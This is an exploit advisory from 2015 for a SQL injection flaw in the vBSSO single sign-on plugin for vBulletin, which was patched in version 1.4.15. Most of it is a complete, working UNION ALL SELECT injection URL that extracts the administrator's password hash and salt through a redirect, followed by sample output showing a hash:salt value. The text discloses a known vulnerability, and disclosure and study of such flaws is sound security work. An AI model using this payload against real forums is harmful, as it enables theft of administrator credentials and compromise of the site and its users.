# Exploit Title: vBulletin vBSSO Single Sign-On – <= 1.4.14 – SQL Injection # Date: January 20, 2015 # Exploit Author: Technidev (https://technidev.com) # Vendor Homepage: https://vbulletin.com # Software Link: http://www.vbulletin.org/forum/showthread.php?t=270517 # Version: <= 1.4.14, patched in >= 1.4.15 This plugin is vulnerable to SQL injection at the /vbsso/avatar.php file in the fetchUserinfo function. It requires a big UNION ALL SELECT query and commenting out the LIMIT function of SQL. If SQL injection is a success, the browser will redirect the user to a URL where the URL contains the extracted information. To exploit this, you need to execute a rather large UNION ALL SELECT query like this: http://example.com/vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid = 1 UNION ALL SELECT userfield.*, usertextfield.*, user.*, usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, concat(user.password, 0x3a, user.salt) AS avatarpath, NOT ISNULL(customavatar.userid) AS hascustomavatar, customavatar.dateline AS avatardateline, customavatar.width AS avwidth, customavatar.height AS avheight, customavatar.height_thumb AS avheight_thumb, customavatar.width_thumb AS avwidth_thumb, customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN usertextfield AS usertextfield ON (usertextfield.userid = user.userid) LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT JOIN customavatar AS customavatar ON (customavatar.userid = user.userid) WHERE user.userid = 1 ORDER BY avatarpath DESC%23 For example, by visiting this URL on a vulnerable forum, you will be redirected to http://example.com/9d0d647f535a4c1f493eabf3d69ca89a:nO^sh9;TVNxGJ”X’+3cYkq9Z4Cd3WS which obviously contains the hash and salt of userid 1.